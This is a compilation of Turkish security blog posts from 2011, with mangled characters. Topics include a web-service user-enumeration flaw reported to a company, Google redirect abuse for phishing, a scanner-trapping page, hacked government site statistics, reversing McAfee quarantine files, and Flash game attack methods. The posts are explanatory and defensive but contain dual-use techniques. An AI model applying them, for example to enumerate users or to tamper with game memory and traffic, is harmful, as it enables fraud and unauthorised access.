kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

